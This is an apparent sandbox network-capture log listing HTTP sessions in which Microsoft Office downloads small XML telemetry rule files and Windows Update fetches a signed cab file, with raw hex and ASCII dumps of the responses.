                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:07 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9964B277"
                                                                                                                                                                                  x-ms-request-id: 02a2c6fa-b01e-0001-107b-3b46e2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134707Z-178bfbc474btvfdfhC1NYCa2en00000004mg000000009k1g
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:07 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  24192.168.2.44980513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:06 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:07 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 467
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                  x-ms-request-id: de6003cd-b01e-0098-493c-3ccead000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134707Z-178bfbc474bbcwv4hC1NYCypys00000004gg0000000000k6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:07 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  25192.168.2.44981413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:08 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB344914B"
                                                                                                                                                                                  x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134709Z-178bfbc474bpscmfhC1NYCfc2c000000030000000000k805
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:09 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  26192.168.2.44981613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:08 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9018290B"
                                                                                                                                                                                  x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134709Z-174c587ffdf59vqchC1TEByk68000000032000000000kbwu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:09 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  27192.168.2.44981313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:08 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                  x-ms-request-id: 5235ff2f-501e-008f-1c4e-3c9054000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134709Z-178bfbc474bscnbchC1NYCe7eg00000004p000000000b01d
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:09 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  28192.168.2.44981513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:08 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                  x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134709Z-174c587ffdfmlsmvhC1TEBvyks000000031000000000n812
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:09 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  29192.168.2.44981713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:08 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9698189B"
                                                                                                                                                                                  x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134709Z-178bfbc474bv587zhC1NYCny5w00000004d0000000009her
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:09 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  30192.168.2.44982120.12.23.50443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:09 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oVv8Y9gncPuzzCl&MD=+dMAy9tu HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                  2024-11-23 13:47:10 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                  MS-CorrelationId: e55b2992-cb27-42c2-ba90-3ddaad57e03f
                                                                                                                                                                                  MS-RequestId: 4cc1dfe1-8fff-49d1-9941-da37cdc787c3
                                                                                                                                                                                  MS-CV: nSv5ctK130mANEo1.0
                                                                                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:09 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 30005
                                                                                                                                                                                  2024-11-23 13:47:10 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                  2024-11-23 13:47:10 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  31192.168.2.44982213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:11 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 469
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA701121"
                                                                                                                                                                                  x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134711Z-178bfbc474bbbqrhhC1NYCvw7400000004r0000000006uvt
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:11 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  32192.168.2.44982513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:11 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 464
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                  x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134711Z-178bfbc474bwh9gmhC1NYCy3rs00000004h000000000fu4a
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
